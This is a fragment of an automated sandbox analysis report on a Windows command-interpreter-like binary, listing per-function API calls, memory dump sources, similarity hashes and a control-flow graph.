  • Part of subcall function 00007FF6E9434A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
  • Part of subcall function 00007FF6E9434A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
  • Part of subcall function 00007FF6E9434A14: memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
  • Part of subcall function 00007FF6E9434A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
  • Part of subcall function 00007FF6E9434AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AD6
  • Part of subcall function 00007FF6E9434AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AEF
  • Part of subcall function 00007FF6E9435554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6E9434E35), ref: 00007FF6E94355DA
  • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435623
  • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435667
  • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E94356BE
  • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435702
• GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E35
• GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E81
• GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434F69
• GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434F95
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FB0
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FC1
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FD8
• GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FF8
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435037
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943504B
• GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E94350DF
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E94350F2
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943510F
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435130
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943514A
• free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435175
  • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
  • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
  • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
  • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
  • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
  • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                        • API String ID: 1049357271-3021193919
                                                                                                                                                                        • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                                                                                                                        • Instruction ID: a5e03e501005a527bfbbdda5d1ec8130c2024aa10fc9089661f826422e029ff3
                                                                                                                                                                        • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                                                                                                                        • Instruction Fuzzy Hash: 56C14263A08A46D6EB14DF61A8543B977A0FF89B91F448134D90EC77A1DF3EA44DC30A

Control-flow Graph
• Function 7ff6e9433c24 (graph rendering not reproduced here)
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
• String ID: :
• API String ID: 1809961153-336475711
• Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
• Instruction ID: 7e374998180753811e0c53a659e59f4b4d86c053be5e0ee11f8edd63c92f8fa0
• Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
• Instruction Fuzzy Hash: C0D12A23609B85D2EA64DF35E4583AAB7A1FF84B40F844135DA4E837A4DF3DE548CB05

Control-flow Graph
• Function 7ff6e9432394 (graph rendering not reproduced here)
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
• String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
• API String ID: 2622545777-4197029667
• Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
• Instruction ID: 6466884da9807152d6b97d5d93e782d0e324c227afa02ad116da6a939ad33ced
• Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
• Instruction Fuzzy Hash: EF916C63A0A686D6EF25CF71D8583B963A0FF58B84F444135CA0E87795DE3EE508C706

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID: CMD.EXE
• API String ID: 1606018815-3025314500
• Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
• Instruction ID: 8ec1ff90e9fb9a4322e3816c0ad23d2cfe31b8354a8088ccf55bb780f563b8a6
• Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
• Instruction Fuzzy Hash: AC419DB6A19702CBE7159F64E8553787BA0BF9A751F449235C90EC2361DF3EA40CC70A

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 992 7ff6e942c620-7ff6e942c66f GetConsoleTitleW 993 7ff6e942c675-7ff6e942c687 call 7ff6e942af14 992->993 994 7ff6e943c5f2 992->994 999 7ff6e942c689 993->999 1000 7ff6e942c68e-7ff6e942c69d call 7ff6e942ca40 993->1000 996 7ff6e943c5fc-7ff6e943c60c GetLastError 994->996 998 7ff6e943c5e3 call 7ff6e9423278 996->998 1004 7ff6e943c5e8-7ff6e943c5ed call 7ff6e943855c 998->1004 999->1000 1000->1004 1005 7ff6e942c6a3-7ff6e942c6ac 1000->1005 1004->994 1007 7ff6e942c954-7ff6e942c95e call 7ff6e943291c 1005->1007 1008 7ff6e942c6b2-7ff6e942c6c5 call 7ff6e942b9c0 1005->1008 1013 7ff6e943c5de-7ff6e943c5e0 1007->1013 1014 7ff6e942c964-7ff6e942c972 call 7ff6e94289c0 1007->1014 1015 7ff6e942c6cb-7ff6e942c6ce 1008->1015 1016 7ff6e942c9b5-7ff6e942c9b8 call 7ff6e9435c6c 1008->1016 1013->998 1014->996 1024 7ff6e942c978-7ff6e942c99a towupper 1014->1024 1015->1004 1018 7ff6e942c6d4-7ff6e942c6e9 1015->1018 1023 7ff6e942c9bd-7ff6e942c9c9 call 7ff6e943855c 1016->1023 1021 7ff6e943c616-7ff6e943c620 call 7ff6e943855c 1018->1021 1022 7ff6e942c6ef-7ff6e942c6fa 1018->1022 1025 7ff6e943c627 1021->1025 1022->1025 1026 7ff6e942c700-7ff6e942c713 1022->1026 1039 7ff6e942c9d0-7ff6e942c9d7 1023->1039 1029 7ff6e942c9a0-7ff6e942c9a9 1024->1029 1031 7ff6e943c631 1025->1031 1030 7ff6e942c719-7ff6e942c72c 1026->1030 1026->1031 1029->1029 1034 7ff6e942c9ab-7ff6e942c9af 1029->1034 1035 7ff6e943c63b 1030->1035 1036 7ff6e942c732-7ff6e942c747 call 7ff6e942d3f0 1030->1036 1031->1035 1034->1016 1037 7ff6e943c60e-7ff6e943c611 call 7ff6e944ec14 1034->1037 1042 7ff6e943c645 1035->1042 1046 7ff6e942c8ac-7ff6e942c8af 1036->1046 1047 7ff6e942c74d-7ff6e942c750 1036->1047 1037->1021 1040 7ff6e942c9dd-7ff6e943c6da SetConsoleTitleW 1039->1040 1041 7ff6e942c872-7ff6e942c8aa call 7ff6e943855c call 7ff6e9438f80 1039->1041 1040->1041 1051 
7ff6e943c64e-7ff6e943c651 1042->1051 1046->1047 1050 7ff6e942c8b5-7ff6e942c8d3 wcsncmp 1046->1050 1052 7ff6e942c76a-7ff6e942c76d 1047->1052 1053 7ff6e942c752-7ff6e942c764 call 7ff6e942bd38 1047->1053 1050->1052 1058 7ff6e942c8d9 1050->1058 1059 7ff6e943c657-7ff6e943c65b 1051->1059 1060 7ff6e942c80d-7ff6e942c811 1051->1060 1056 7ff6e942c840-7ff6e942c84b call 7ff6e942cb40 1052->1056 1057 7ff6e942c773-7ff6e942c77a 1052->1057 1053->1004 1053->1052 1077 7ff6e942c856-7ff6e942c86c 1056->1077 1078 7ff6e942c84d-7ff6e942c855 call 7ff6e942cad4 1056->1078 1065 7ff6e942c780-7ff6e942c784 1057->1065 1058->1047 1059->1060 1061 7ff6e942c817-7ff6e942c81b 1060->1061 1062 7ff6e942c9e2-7ff6e942c9e7 1060->1062 1067 7ff6e942ca1b-7ff6e942ca1f 1061->1067 1068 7ff6e942c821 1061->1068 1062->1061 1069 7ff6e942c9ed-7ff6e942c9f7 call 7ff6e943291c 1062->1069 1070 7ff6e942c83d 1065->1070 1071 7ff6e942c78a-7ff6e942c7a4 wcschr 1065->1071 1067->1068 1079 7ff6e942ca25-7ff6e943c6b3 call 7ff6e9423278 1067->1079 1073 7ff6e942c824-7ff6e942c82d 1068->1073 1086 7ff6e942c9fd-7ff6e942ca00 1069->1086 1087 7ff6e943c684-7ff6e943c698 call 7ff6e9423278 1069->1087 1070->1056 1075 7ff6e942c7aa-7ff6e942c7ad 1071->1075 1076 7ff6e942c8de-7ff6e942c8f7 1071->1076 1073->1073 1080 7ff6e942c82f-7ff6e942c837 1073->1080 1082 7ff6e942c7b0-7ff6e942c7b8 1075->1082 1083 7ff6e942c900-7ff6e942c908 1076->1083 1077->1039 1077->1041 1078->1077 1079->1004 1080->1065 1080->1070 1082->1082 1088 7ff6e942c7ba-7ff6e942c7c7 1082->1088 1083->1083 1089 7ff6e942c90a-7ff6e942c915 1083->1089 1086->1061 1093 7ff6e942ca06-7ff6e942ca10 call 7ff6e94289c0 1086->1093 1087->1004 1088->1051 1094 7ff6e942c7cd-7ff6e942c7db 1088->1094 1095 7ff6e942c917 1089->1095 1096 7ff6e942c93a-7ff6e942c944 1089->1096 1093->1061 1111 7ff6e942ca16-7ff6e943c67f GetLastError call 7ff6e9423278 1093->1111 1100 7ff6e942c7e0-7ff6e942c7e7 1094->1100 1101 7ff6e942c920-7ff6e942c928 1095->1101 1103 7ff6e942ca2a-7ff6e942ca2f call 7ff6e9439158 1096->1103 1104 7ff6e942c94a 1096->1104 
1106 7ff6e942c7e9-7ff6e942c7f1 1100->1106 1107 7ff6e942c800-7ff6e942c803 1100->1107 1108 7ff6e942c92a-7ff6e942c92f 1101->1108 1109 7ff6e942c932-7ff6e942c938 1101->1109 1103->1013 1104->1007 1106->1107 1112 7ff6e942c7f3-7ff6e942c7fe 1106->1112 1107->1042 1113 7ff6e942c809 1107->1113 1108->1109 1109->1096 1109->1101 1111->1004 1112->1100 1112->1107 1113->1060
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ConsoleTitlewcschr
• String ID: /$:
• API String ID: 2364928044-4222935259

APIs
Similarity
• API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
• String ID:
• API String ID: 4291973834-0

APIs
• GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
• memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
• FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
Similarity
• API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
• String ID:
• API String ID: 1623332820-0

APIs
Similarity
• API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
• String ID:
• API String ID: 1826527819-0
APIs
  • Part of subcall function 00007FF6E9431EA0: wcschr.MSVCRT(?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6E9450D54), ref: 00007FF6E9431EB3
• SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6E94292AC), ref: 00007FF6E94330CA
• SetErrorMode.KERNELBASE ref: 00007FF6E94330DD
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E94330F6
• SetErrorMode.KERNELBASE ref: 00007FF6E9433106
Similarity
• API ID: ErrorMode$FullNamePathwcschr
• String ID:
• API String ID: 1464828906-0
APIs
Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                        • API String ID: 2221118986-3416068913
                                                                                                                                                                        • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                        • Instruction ID: adc56153d8a4f5a917308771b6521df14ffb690cace7d28b55b40f4fcb9fda6e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                        • Instruction Fuzzy Hash: 3111C223A08642C1EB54CF65E1547B92290AF88BA4F184331EE6DCB7D5DE3ED488C309
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetwcschr
                                                                                                                                                                        • String ID: 2$COMSPEC
                                                                                                                                                                        • API String ID: 1764819092-1738800741
                                                                                                                                                                        • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                        • Instruction ID: 3a5bf441f305daf567a70258dc4e0215cee3d97320fecd91dfc8596b65f84f32
                                                                                                                                                                        • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                        • Instruction Fuzzy Hash: 84513823E08642C5FBA59F25A4513792299BF86B84F084031DA4DCB6D6DE7EE84CC74B
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4254246844-0
                                                                                                                                                                        • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                                                                        • Instruction ID: 12b563f7c100edb412fb752c3c066078e3a9841c1448a9ce836a221fd10ed234
                                                                                                                                                                        • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                                                                        • Instruction Fuzzy Hash: 76418C23A09742D6EA20DF30E44837967A0EF99B84F548530DE4E87785EE3EE449C70A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_osfhandle$ConsoleMode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1591002910-0
                                                                                                                                                                        • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                        • Instruction ID: c8a2111804c62b25ae75e43f098399c7c2e4dab27355f7f5b984c129ebbbac2a
                                                                                                                                                                        • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                        • Instruction Fuzzy Hash: 63F062B6A19702CBE7148F50E8552787BA0FF8E711B444135C90A83321DE3EA40DCB0A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DriveType
                                                                                                                                                                        • String ID: :
                                                                                                                                                                        • API String ID: 338552980-336475711
                                                                                                                                                                        • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                        • Instruction ID: a7bed3ff1cc0aaa4c24b84637877993dfc0e89d169c3b78b9a0e391ea8c7ca19
                                                                                                                                                                        • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9AE06D67618641C7E7209FA0E4511AAB7A0FF8D748F841529EA8D83724DF3CD249CB0D
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE ref: 00007FF6E9435B52
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E9434297
